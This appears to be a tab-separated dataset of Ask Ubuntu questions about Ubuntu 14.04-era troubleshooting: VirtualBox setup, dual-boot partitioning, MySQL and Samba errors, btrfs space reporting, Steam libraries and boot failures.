464005	how to setup 64 bit windows7 guest under 64 bit ubuntu 14.04 from oem disk	i have ubuntu 14.04 lts running on lenovo t540p . ubuntu is only os on machine , windows 8 original os deleted . i wish to install win 7 64 bit under virtual box on this machine . i went to the `` official instructions '' : there i find two methods , open source and oracle editions . first i tried the open source way ( sudo apt-get install virtualbox ) . it installed cleanly . i added a new vm , placed with win7 64 bit oem disk into the drive and attempted to start my new vm . got the following error message : failed to open a session for the virtual machine windows7 . vt-x is disabled in the bios . ( verr_vmx_msr_vmxon_disabled ) . with these further details : result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 8ab7c520-2442-4b66-8d74-4ff1e195d2b6 } not having any clue what this was trying to tell me , i decided to uninstall the open source version and try the oracle version , the one with the long installation string on the official ubuntu page : sudo sh -c `` echo 'deb http : //download.virtualbox.org/virtualbox/debian ' $ ( lsb_release -cs ) ' contrib non-free ' > /etc/apt/sources.list.d/virtualbox.list '' & & wget -q http : //download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -o- | sudo apt-key add - & & sudo apt-get update & & sudo apt-get install virtualbox-4.3 dkms this also installed cleanly but only allowed me the choice of 32-bit guest oses . i suspect that the above instructions only apply to the 32-bit version of vbox . so i uninstalled that version of vbox and am now back to square one . so ... can someone explain the error message with the open source vbox or provide the correct way to get the oracle version for 64 bit ubuntu or provide another way to get this done ? thanks .
464008	very misleading install options for installing alongside windows	my laptop came installed with wiwndows 8 in uefi boot . i had installed debian ( in legacy boot mode ) a while back . it all worked fine except for the need to switch boot modes every time i changed my setup . today i decided that ubuntu was better suited for me and tried to replace my debian/windows dual boot with a ubuntu/windows dual boot . i set up an usb drive with the right iso and started the process . i booted on the usb drive ( in efi mode ) and started the install . when i was asked if i wanted to install alongside debian or instead of debian i chose the later since i thought this would leave windows alone . i was so wrong ! it formatted my whole hard drive and now i only have the brand new ubuntu partition . i insist that debian and windows were both working fine . i know there is no way back and i should have been more careful , so my question is : should n't there have been mention of windows in this ( oh so fatidic ) page of the assistant ? i would almost have expected the assistant to detect windows and not debian since it was setup in legacy and the usb drive booted on uefi but the reverse seems to have happened . anyway i learned my lesson : no more letting an assistant `` manage '' my partitions ...
464015	problem with wifi	i 've been looking here and elsewhere for a long time to fix my wireless issues . i upgraded to lubuntu 14.04 and my wireless stopped working . i tried a lot of things , and then it mysteriously started working again . i later installed security upgrades and it stopped working again . the accepted answere at this link ask ubuntu pointed to a script to run . the output of that script is at http : //pastebin.com/b5clydkx . please help
464016	display ( compiz/unity ) errors	when i press the `` windows '' ( super ) key the starter will appear as if i pressed and hold the key . when io swich to my other account it works fine resetting unity and compiz achieved nothing . sound will come from speakers as well as headphones even if output is set to headphone . thank you for the person who correct my spelling and grammar errors in advance .
464017	laravel loading error in ubuntu 14.04	when i tried to access my laravel after successfull installation , instead of the default page it shows an error in the webpage . mcrypt php extension required . i have tried some fixes like this , sudo ln -s /etc/php5/conf.d/mcrypt.ini /etc/php5/apache2/conf.d/20-mcrypt.ini ln : failed to create symbolic link ‘/etc/php5/apache2/conf.d/20-mcrypt.ini’ : file exists sudo service apache2 restart
464019	sometimes ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock '	i 've got my application up and running , with rails on my ubuntu vps in linode with mysql . here 's the version of mysql : mysql ver 14.14 distrib 5.5.35 , for debian-linux-gnu ( x86_64 ) using readline 6.2 it all generally work fine , except that , sometimes when i open a new rails console i get the following error : /var/www/app/shared/bundle/ruby/2.0.0/gems/mysql2-0.3.14/lib/mysql2/client.rb:67 : in `connect ' : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) ( mysql2 : :error ) from /var/www/app/shared/bundle/ruby/2.0.0/gems/mysql2-0.3.14/lib/mysql2/client.rb:67 : in `initialize' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/mysql2_adapter.rb:16 : in `new' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/mysql2_adapter.rb:16 : in `mysql2_connection' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/abstract/connection_pool.rb:315 : in `new_connection' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/abstract/connection_pool.rb:325 : in `checkout_new_connection' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/abstract/connection_pool.rb:247 : in `block ( 2 levels ) in checkout' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/abstract/connection_pool.rb:242 : in `loop' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/abstract/connection_pool.rb:242 : in `block in checkout' from /home/user/.rvm/rubies/ruby-2.0.0-p353/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/abstract/connection_pool.rb:239 : in `checkout' from /var/www/app/shared/bundle/ruby/2.0.0/gems/activerecord-3.2.16/lib/active_record/connection_adapters/abstract/connection_pool.rb:102 : in `block in connection' from /home/user/.rvm/rubies/ruby-2.0.0-p353/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' and from them all attempts to enter the console fail . why the application still works fine and it 's still using the database . if i do in a shell : $ sudo /etc/init.d/mysql status * mysql is stopped . $ sudo /etc/init.d/mysql stop * stopping mysql database server mysqld ... [ ok ] $ sudo /etc/init.d/mysql start * starting mysql database server mysqld ... [ fail ] but the application keeps working fine all the time . the /var/log/mysql/error.log was empty before these three commands , after them i read : 140510 19:14:32 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql 140510 19:14:32 [ warning ] using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release . please use the full name instead . 140510 19:14:32 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140510 19:14:32 [ note ] plugin 'federated ' is disabled . 140510 19:14:32 innodb : the innodb memory heap is disabled 140510 19:14:32 innodb : mutexes and rw_locks use gcc atomic builtins 140510 19:14:32 innodb : compressed tables use zlib 1.2.8 140510 19:14:32 innodb : using linux native aio 140510 19:14:32 innodb : initializing buffer pool , size = 128.0m 140510 19:14:32 innodb : completed initialization of buffer pool innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . 140510 19:14:32 innodb : retrying to lock the first data file innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process ... .. several thousands of these lines ... innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . 140510 19:16:12 innodb : unable to open the first data file innodb : error in opening ./ibdata1 140510 19:16:12 innodb : operating system error number 11 in a file operation . innodb : error number 11 means 'resource temporarily unavailable ' . innodb : some operating system error numbers are described at innodb : http : //dev.mysql.com/doc/refman/5.5/en/operating-system-error-codes.html 140510 19:16:12 innodb : could not open or create data files . 140510 19:16:12 innodb : if you tried to add new data files , and it failed here , 140510 19:16:12 innodb : you should now edit innodb_data_file_path in my.cnf back 140510 19:16:12 innodb : to what it was , and remove the new ibdata files innodb created 140510 19:16:12 innodb : in this failed attempt . innodb only wrote those files full of 140510 19:16:12 innodb : zeros , but did not yet use them in any way . but be careful : do not 140510 19:16:12 innodb : remove old data files which contain your precious data ! 140510 19:16:12 [ error ] plugin 'innodb ' init function returned error . 140510 19:16:12 [ error ] plugin 'innodb ' registration as a storage engine failed . 140510 19:16:12 [ error ] unknown/unsupported storage engine : innodb 140510 19:16:12 [ error ] aborting 140510 19:16:12 [ note ] /usr/sbin/mysqld : shutdown complete 140510 19:16:12 mysqld_safe mysqld from pid file /var/run/mysqld/mysqld.pid ended only rebooting the vps seems to solve the issue , which comes back after one or two console connections . i figured that shutting down mysql from init.d does n't shut it down , to stop it i need to kill it , then it automatically respawns . $ ps -ef | grep mysq [ l ] mysql 31063 1 0 may19 ? 00:00:34 /usr/sbin/mysqld $ sudo /etc/init.d/mysql stop * stopping mysql database server mysqld [ ok ] $ ps -ef | grep mysq [ l ] mysql 31063 1 0 may19 ? 00:00:34 /usr/sbin/mysqld $ sudo kill -9 31063 $ ps -ef | grep mysq [ l ] mysql 6052 1 3 09:23 ? 00:00:00 /usr/sbin/mysqld $ any clue ?
464021	ubuntu 14.04 not booting before windows 8.1	i try to boot my computer into ubuntu , but i end up having to manually select ubuntu from the devices menu , even though it was supposed to boot first . instead windows 8 boots up like ubuntu is n't even there ! and grub works just fine when ubuntu is selected in the boot device menu . ( how else am i on ? ) i tried using easybcd but kept getting errors from the windows boot manager . and just in case it helps , during installation of ubuntu it did n't recognize windows 8 , and i had to resize and install manually . anything i can do ? notes : everyone ! ! ! grub works perfectly ! ! ! it is an error in the hp boot menu as i have previously said ! ! ! please do not give me answers for grub edits in the future ! ! ! here are my specs : pc type : hp 2000-2d49wm notebook pc ram : 4gb swap : 2gb processor : amd e-300 vision 1.3 ghz x2 bios edition : n\a until further notice
464023	upgrading and recovery options with software raid 1	i recently installed xubuntu on a spare machine that is serving as a nas , voice communication , and hosting various other services . i have a 120gb ssd containing the os and 2 4tb drives configured as raid 1 using mdadm , that has all of my media . everything seems to be working fine but what i am concerned about is , if one hard drive fails what are my recovery options ? also , if i pull a drive out , is it possible to mount it on another computer for recovery reasons ? also how are upgrades handled with the software raid . when a new lts version is released should i upgrade and will my array fail ?
464024	14.04 fstab / samba permission issue	i messed around with linux a few years ago , but am just setting up a new media server at home . i 've spent a day and a half trying to get samba working . had a breakthrough today - just need to do something else , but do n't quite know what ! system has 2x2tb sata drives which store media . these are mounted to /mnt/westdig2tb and /mnt/wd2tb fstab entry is as such : uuid=6a5877d058779a11 /mnt/westdig2tb ntfs-3g auto , users , permissions 0 0 currently , samba is sharing the files and windows 7 & 8 can view . this is great . however , i would like 1 windows machine to have read & write access . no messing around in smb.conf seems to enable me to do this . the windows machines never ask for a password - it is as if guest access is always on . probably something to do with that fstab entry . the goal : 5 windows machines + htpc ( xbmc ) with read only access . 1 windows laptop , and the ubuntu desktop , with full read/write access . here are some section from smb.conf [ global ] server role = standalone server passwd program = /usr/bin/passwd % u pam password change = yes unix password sync = yes server string = media server ( samba , ubuntu ) usershare allow guests = no dns proxy = no map to guest = bad user ; passdb backend = tdbsam workgroup = ccc security = user panic action = /usr/share/samba/panic-action % d ; netbios name = mediaserve passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . ; os level = 20 syslog = 0 max log size = 1000 obey pam restrictions = yes log file = /var/log/samba/log. % m [ audiobooks ] writeable = yes read list = xbmc path = /mnt/westdig2tb/audiobooks write list = rxxxx , xbmcwrite browseable = yes [ hd movies 2 ] path = /mnt/westdig2tb/hd movies 2 writeable = yes public = yes create mask = 0755 write list = rxxxx , xbmcwrite [ share ] path = /srv/share writeable = yes public = yes i did mess with chmod for these directories . ls -all shows drwxrwxrwx for both folders in the /mnt directory . any help would be greatly appreciated ! thanks .
464025	how to change the screen gamma-curve ?	where can i change the gamma-curve of my monitor under ubuntu ? i ca n't find it under systemsettings . i 'm using a lenovo thinkpad edge 130 .
464028	how can i share an internet connection from a usb wwan0 lte connecton through eth0 to a router ?	i would like to share a sierra wireless ( sw ) -313u 4g lte wwan0 connection through eth0 to a cisco ea6500 wifi router . is there a secure way to do this without iptables ? i have a laptop running ubuntu-gnome 14.04 , 1-nic , and a sierra wireless 4g lte usb-aircard through t-mobile
464029	installing win7 form oem disk under vbox , where is my cd/dvd driver	i bought new lenovo t540p . the plan was to run windows under virtualbox on the ubuntu host . i managed to unintentionally wipe the original windows 8.1 that came with the computer off the disk . but that 's ok ( i thought ) , i 'll just run ubuntu ( 14.04 ) . and got virtualbox up and running . i bought a windows7 oem disk . ( it is apparently impossible and/or illegal to use the preinstalled windows inside a vm , and i did n't want dual boot ) . created a vm under virtualbox , loaded in the cd , and tried to run it . it started to run and then it asks me for the disk with the cd driver . i have no idea where to find this . why does it need the cd driver . ca n't it use the one that is running the cd now ? or if it does , where do i find this driver ? edit : as you can see below , i 've accepted the answer below . in answer to terdon 's questions : the message is in the windows installer : '' required cd/dvd device driver is missing . if you have a driver floppy disk , cd , dvdm or usab flash drive , please insert it now . note . if the windows installation media is in the drive , you can safely remove it for this step . '' it appears shortly after you select your language , time format and keyboard ( first questions the windows installer asks you ) .
464030	ubuntu 14.04 start error	after a few days in a fresh xpsp3/ubuntu 14.04 dual boot intallation i started to get this error : executable path /usr/sbin/unity-greeter . this happens every time i start ubuntu and sending a error report does n't work either , after i close all report windows the system seems apparently normal . being the computer illiterate that i am is there a simple enough procedure that could fix this error ? thank you .
464031	problem while installing kubuntu dual boot with windows 7	i want to install kubuntu dual boot on my windows 7 laptop . now i 'm familiar with dual boot with ubuntu but the problem either of windows 7 or kubuntu wo n't . here are the partitions i made : 200 gb for c 415 gb for d 83 gb unallocated partition from disk management tool on windows : 250 mb boot 3000 mb swap and the rest for / partition . that puts us in the following partition as in the installer /dev/sda /dev/sda1 ( these are the 100 mb made by windows ) /dev/sda2 /dev/sda3 /dev/sda5 /dev/sda6 /dev/sda7 i did it multiple times , if i choose /dev/sda as bootloader device , windows wo n't boot ( although this choice was working on ubuntu ) . and if i choose /dev/sda3 kubuntu wo n't appear and even by using easybcd . any is really appreciated . i do n't know where is the problem although everything i said was working in ubuntu .
464032	my wubi usb installer can '' t seem to find installation files	while attempting to install ubuntu , 14.4 lts on my windows 7 hp mini 110-3130nr netbook for 32 bit from an usb wubi installer , an error message came up and stated that it could not find installation files .
464034	failure proof logical volumes on heterogenous bunch of irreliable hard disks	like i guess most people do , i have accumulated an assortment of various hard drives over the years . they are mostly of different size , manufacturer , speed , etc . there are too many off them to put them in most cheap computer cases ( i.e . stuff like hardware raids are out of question because of prohibitive cost ) . most of them are 3.5 '' disks in external usb 2.0 enclosures because those were cheapest ( and still are , for some reasons internal hard disks are n't cheaper where i tend to buy my hard disks ) . i would like to use some of those hard drives together as one volume ( probably splitting them among two of those virtual volumes , one for backups and one for the originals , where the originals would need more read speed { streaming videos/music and providing files for a handful of users } and the backups more write speed { for making them , while reading them would be the exception } ) . ideally those volumes should already have some way of dealing with disk failures as that 's something that /will/ happen and i would n't want to rebuild the whole thing from the backup every time a disk fails . in the long term those volumes would grow as i replaced failing disks with disks of the best price/gb ratio at the time of the old ones failing . how would i do this best ? do you have any links to people comparing and explaining different solutions to this problem ? i 've already done some research on this and have some more specific questions too : software raids with mdadm would n't work well with varying sizes , would they ? what is the usual procedure to follow when a disk fails with lvm ? it seems btrfs could do this kind of stuff ( combining raid-like functions with virtual volumes like lvm ) and it 's not /that/ unstable anymore , am i right it could solve my problem , should i look more into it ?
464038	how to install 64 bit program ( deb ) on my 32 bit ubuntu install ?	i 've got a deb which is for 64bit ubuntu , but unfortunately i 've got a 32bit installation ( 14.04 ) . i tried installing from the command line with sudo dpkg -i thedebpackage.deb , but i get a message saying that the package architecture ( amd64 ) is not in line with the system ( i386 ) ( free translation from dutch ) . when searching i find all these posts about running 32bit software on 64bit ubuntu , but not the other way around . does anybody know how i can install this 64bit deb on my 32bit installation ?
464040	security and encryption	i would like to know if there is any way to encrypt an entire directory without having to compact it first in one file . for example : aescrypt -e -p `` password '' `` file '' using the command above i can encrypt a file but what i really need is to encrypt an entire directory keeping its structure .
464042	sound from vlc cuts in and out	when playing dvds with vlc the audio cuts in and out . what can be causing it ? i 'm using xubuntu 14.04 ( 32 bit ) . i 'm using a gateway 310h desktop with a thraser intel motherboard . the audio is integrated into the motherboard itself .
464044	ware , ubuntu , xrdp and network issues	so we are experiencing something we ca n't quite figure out . what we have is : esxi 5.5 ubuntu 12.04 vms xrdp on vms for rdp access . iscsi nas for vm storage . vcenter server ( physical machine ) vxl thin clients running ubuntu os remmina rdp client on ubuntu os the networking is like this : 1 ) esxi , nas are connected to one switch 2 ) vcenter is connected to a different switch 3 ) thin clients are connected to a third switch 4 ) all these switches are connected to an l3 switch the issue : users experience rdp slowness , drops and hangs . but the vmware performance counters do n't show anything . we were thinking it might be a network issue , so we did was to rdp to vm and run video on the vm . from the labs where the thin clients are , we start experience ping drops , upto 60 % . from the vcenter pc , we do rdp to even 10 of these vms and run ping tests , no loss . we have tried to advice the client that is something on their network infrastructure that 's causing it , but they do n't agree . they are saying if they use a windows physical machine , put into switch connected to esxi 's switch and rdp it from the thinclients and run the video , no ping drops again . we are sure its their network but do n't if its at vmware side or physical network side . we need to prove either way to move forward . any suggestions will be much appreciated . also , please let us know if anyone needs any logs to check the issues .
464045	audacity will not record a second track properly , first track is just fine	any time i use any device to record with audacity , it works just fine on the first track . on the second track , it gets very skippy , blotchy , and otherwise can not be repaired to be used in any production . the skipping and clicks are visible in the waveform . mp3 file waveform screenshot
464049	how to retain date stamp while copying to another pc	similarly to how to maintain a file 's 'last modified ' date ? i need to retain the date while copying the file by krusader or in a 'home folder ' window to another pc connected by ssh . is it possible ?
464050	how to install an application from gitweb	i need to get the latest available version of an application called arm which is a terminal monitor for tor . the download instructions [ on the application webpage ] [ 2 ] has a link to an older version that i can get through a package in ubuntu . the latest version is available in the gitweb . i downloaded it by using snapshot and then tried to build it on ubuntu 12.04 from its source by using ( ./configure & & make & & make install ) . i got an error that says bash : ./configure : no such file or director any idea how can i install the application from gitweb or how to get the latest version of the application that i want . thanks in advance !
464051	how do i get steam to work with nvidia 750 ti and 14.04 ?	i have this error here is my output : you are missing the following 32-bit libraries , and steam may not run : libc.so.6 . i 've tried all of the fixes listed on this page and they are either out of date or do n't work with my arc . nvidia gtx 750 ti ubuntu 14.04 running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) /home/chris/.local/share/steam/steam.sh : line 755 : 6819 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' mv : can not stat â/home/chris/.steam/registry.vdfâ : no such file or directory installing bootstrap /home/chris/.local/share/steam/bootstrap.tar.xz reset complete ! restarting steam by request ... running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/chris/.local/share/steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) /home/chris/.local/share/steam/steam.sh : line 755 : 6946 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' update 1 downgraded to 12.04 still receiving the same error . update 2 tried to switch between drivers to download steam but no proprietary drivers where present in the additional drivers menu . update 3 fixed ! i could n't boot into my graphics card so i started using nomodeset by hitting right shift tab to get into grub then editing my boot file replacing quiet splash with nomodeset . this got me booted but after installing the drivers on tty3 i still had the missing library error in ubuntu . so i went to mint cinnamon 64 . i installed the nvidia drivers by dropping to tty1 , stopping mdm , and making sure to take the 32 libraries when installing the driver . it made steam load perfectly well . i still have to edit the boot file to nomodeset to get it to boot properly , but i 'll call it a win anyway .
464053	`` multiple desktops '' missing from workspace behavior in kubuntutrusty	i 've just upgraded to kubuntu trusty . there were some errors during the update which i did not understand , so i just plowed on and restarted . now i ca n't get multiple desktops . more precisely , the `` workspace behavior '' section of system settings does not include the virtual desktops section at all . i assume i 'm missing some module or other -- but which one ?
464057	login screen changed	suddenly the login screen for ubuntu 14.04 is switched to another one with a box has a drop-down user change and password field . only the standard dotted background one is visible when i go suspend . i have tried the solutions posted here lost ubuntu 14.04 default login screen respectively but i got the login screen more distorted ! ! how to revert back to the standard dotted background login screen as default when power on pc ? ?
464058	install network printer manually ( tp-link tl-wdr3600 )	i want to use a hp deskjet f380 printer as a usb connected network printer , connected with a tp-link tl-wdr3600 router and it 's not working . this question is a duplicate of : install network printer manually ( router : tp-link tl-wr842nd ) since nobody answered there , i wanted to bump the question , but did n't know of another way other than re-asking the question . i did exactly the same as what was mentioned in that question and got the same results . i also read that the default web-interface for the print server should be 192.168.0.10 , but could n't connect to the web-interface either . got the printer working on osx like op did on windows through the auto-connect software of tp-link , but not on ubuntu . so the printer works through the network by using the auto-connect software , but i do n't know how to setup manually . cups wo n't find the printer : (
464060	boot problems after installing package `android` . how do i fix it ?	i was thinking to play with my android phone through usb , so i did an apt-get install android* on my laptop . this this broke my boot . i can not boot it normally , but if i go into recovery and then resume , it boots ok ( though graphics are running slower ) . i then removed the android packages with apt-get remove android* , but this did n't fix it . the boot hangs as pictured below . the logs for the boot are nowhere to found . but i found this in /var/log/dmesg [ 21.073633 ] init : failed to spawn lxc-android-config main process : unable to execute : no such file or directory [ 21.081249 ] init : adbd-emergency-shell pre-start process ( 894 ) terminated with status 2 [ 21.785001 ] init : udev-fallback-graphics main process ( 917 ) terminated with status 1 [ 23.425461 ] init : ureadahead-touch main process ( 664 ) terminated with status 1 [ 23.456583 ] init : lxc-android-boot main process ( 1012 ) terminated with status 127 [ 23.546875 ] init : friendly-recovery post-stop process ( 658 ) terminated with status 1 [ 23.547479 ] init : failsafe main process ( 1010 ) killed by term signal [ 24.375532 ] init : set.pretty-hostname main process ( 1157 ) terminated with status 127 what did i do and how to fix this . any suggestions ?
464067	where can i see the source code of unzip	so i am interested in how unzip handles it 's -l function and would like to see the source code for it . where could i get my hands on that source code ?
464068	how can i reload video driver after black screen ?	i have intel i915 graphic driver . sometimes i get black screen , i have a shortcut for sudo service lightdm restart but it does n't fix black screen problem . how can i reload graphic driver ? edit : it happens during heavy load of cpu , once it happened while scrolling chromium page . output of xrandr : xrandr screen 0 : minimum 320 x 200 , current 1280 x 800 , maximum 32767 x 32767 lvds1 connected 1280x800+0+0 ( normal left inverted right x axis y axis ) 331mm x 207mm 1280x800 60.0*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) tv1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) edit2 : though i accepted the below answer which was posted by terdon , after i tested it many times i must note that it does n't work . how can i reload video driver when i get black screen ?
464070	how to modify sda5_crypt login page ?	i want to make changes to this page on my crypto login page what i want is to make it all a blank black page . nothing to show but still i want to write password . what file do i need to modify ?
464074	ubuntu thinks btrfs disk is full but its not	cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > uuid=a168d1ac-4e13-4643-976d-6e47ea1732b1 /boot ext2 defaults 0 1 /dev/mapper/sda4_crypt / btrfs defaults , autodefrag , compress=lzo , inode_cache , space_cache , subvol= @ 0 2 /dev/mapper/sda4_crypt /tmp btrfs defaults , autodefrag , compress=lzo , inode_cache , space_cache , subvol= @ tmp 0 2 /dev/mapper/sda4_crypt /run btrfs defaults , autodefrag , compress=lzo , inode_cache , space_cache , subvol= @ run 0 2 /dev/mapper/sda4_crypt /var/crash btrfs defaults , autodefrag , compress=lzo , inode_cache , space_cache , subvol= @ var-crash 0 2 /dev/mapper/sda4_crypt /var/tmp btrfs defaults , autodefrag , compress=lzo , inode_cache , space_cache , subvol= @ var-tmp 0 2 /dev/mapper/sda4_crypt /var/log btrfs defaults , autodefrag , compress=lzo , inode_cache , space_cache , subvol= @ var-log 0 2 /dev/mapper/sda4_crypt /var/spool btrfs defaults , autodefrag , compress=lzo , inode_cache , space_cache , subvol= @ var-spool 0 2 /dev/mapper/sda5_crypt /home btrfs defaults , autodefrag , compress=lzo , inode_cache , space_cache , subvol= @ home 0 3 /dev/mapper/750er /media/750er ext4 defaults 0 4 /dev/mapper/cswap none swap defaults 0 5 ➜ ~ df -h filesystem size used avail use % mounted on /dev/mapper/sda4_crypt 38g 12g 13m 100 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 2,0g 4,0k 2,0g 1 % /dev tmpfs 396m 1,3m 394m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 2,0g 208k 2,0g 1 % /run/shm none 100m 36k 100m 1 % /run/user /dev/mapper/sda4_crypt 38g 12g 13m 100 % /tmp /dev/sda2 231m 44m 175m 21 % /boot /dev/mapper/sda4_crypt 38g 12g 13m 100 % /var/crash /dev/mapper/sda4_crypt 38g 12g 13m 100 % /var/tmp /dev/mapper/sda4_crypt 38g 12g 13m 100 % /var/log /dev/mapper/sda4_crypt 38g 12g 13m 100 % /var/spool /dev/mapper/sda5_crypt 3,7t 2,4t 1,2t 67 % /home /dev/mapper/750er 688g 276g 377g 43 % /media/750er /dev/mapper/2tb 1,8t 1,7t 141g 93 % /media/2tb ➜ ~ sudo btrfs fi df / data , single : total=9.47gib , used=9.46gib system , dup : total=8.00mib , used=16.00kib system , single : total=4.00mib , used=0.00 metadata , dup : total=13.88gib , used=1.13gib metadata , single : total=8.00mib , used=0.00 ➜ ~ it 's a 40gb partition with quite some snapshots on it . but it 's compressed so i think the 9,46gb/40gb is accurate . but my ubuntu fails because it says it has no disk space . i had apt-errors , cant install programs and my mysql server failed to start because of it . and i know about not to rely on df i just included it for completeness . i think ubuntu uses df which is know for reporting wrong with btrfs internally and fails for that reason . that would make sense for apt when it does checks for space . but it actually fails to write to disk . sudo time dd if=/dev/zero of=large bs=2g count=1 dd : error writing ‘large’ : no space left on device 0+1 records in 0+0 records out 11747328 bytes ( 12 mb ) copied , 1,29706 s , 9,1 mb/s command exited with non-zero status 1 0.00user 1.40system 0:01.44elapsed 97 % cpu ( 0avgtext+0avgdata 2098028maxresident ) k 160inputs+23104outputs ( 0major+383008minor ) pagefaults 0swaps
464076	having a bunch of errors relating to duplicate repositories	i upgraded from 12.04 to 14.04 by downloading the new packages using update-manager -d there are many duplicate repositories and i can not update packages or anything else . i get these errors : w : failed to fetch http : //ppa.launchpad.net/jconti/gnome3/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . is it just better to do a fresh install ? how do i fix these errors ?
464077	authentication error when trying to install or uninstall using ubuntu software center ( 14.04 )	when trying to install or uninstall from ubuntu software center ( 14.04 ) . i 'm getting the error message **software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.85 ' } ) : org.debian.apt.install-or-remove-packages** when i try to install or uninstall anything from the center . i 'm running this through crouton on a chromebook . is there anything i can do to fix this issue ?
464080	how can a package maintainer prevent file collisions with ubuntu packages , like trying to overwrite 'file ' , which is also in package ?	i develop ( or maintain ) a package , i 've gotten several bug reports along the lines of : dpkg : error processing /var/cache/apt/archives/libjline-java_1.0-1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/java/jline.jar ' , which is also in package scala 2.9.2-400 errors were encountered while processing : /var/cache/apt/archives/libjline-java_1.0-1_all.deb but i have n't found a way to prevent/find them before someone hits them . how can i prevent these file conflicts/collisions before this even happens ?
464084	problems in kav60 with resolution on bravia monitor	i have installed ubuntu desktop 32bit on a packard bell kav60 ( netbook ) . the installation was fine , but the screen is blank ( not related to ubuntu i just crashed it ) . i connected the netbook to a sony bravia kdl-46w400 and i want to mainly use the netbook to watch videos and play music . the problem is that i ca n't switch the resolution higher than 1024x768 and it will be fine at least have one resolution on 16:9 . also hd videos in h264 have motion problems , but its fine with mp4 at 720 and now for me it is ok to watch some movies and shows , but will be nice if that problem would be fixed by some driver or another stuff .
464087	i ca n't boot from my bootable flash drive	i have a bootable flash drive which i used to use when i needed to run ubuntu 12.04 live . i have set the boot order in the bios with the usb in first position but the installed version of ubuntu 12.04 always loads . i see someone else has asked this question but there are no answers . does anyone have any ideas how to fix this ?
464088	kernel panic after attempting to upgrade to ubuntu 14.04	i have the following problem : i was trying to upgrade from ubuntu 13.10 to ubuntu 14.04 and in the middle ( after the necessary packages were downloaded and beginning to be installed ) , i ran out of space so the whole process froze . after that the only thing i could do was to reboot . but after the reboot i start getting a : kernel panic - not syncing : vfs : unable to mount the root fs on unknown-block ( 0,0 ) cpu : 0 pid : 1 comm : swapper/0 not tainted 3.13.0-24-generic # 47-ubuntu : : and continues with some call trace ... i can still enter the grub menu and select between old kernels and in this case it actually boots correctly with ubuntu 14.04 but then i can not do anything through the unity gui . i can however use a virtual console with ctrl+alt+f1 for example ... anyone had the same problem or knows any way to fix this ? thanks !
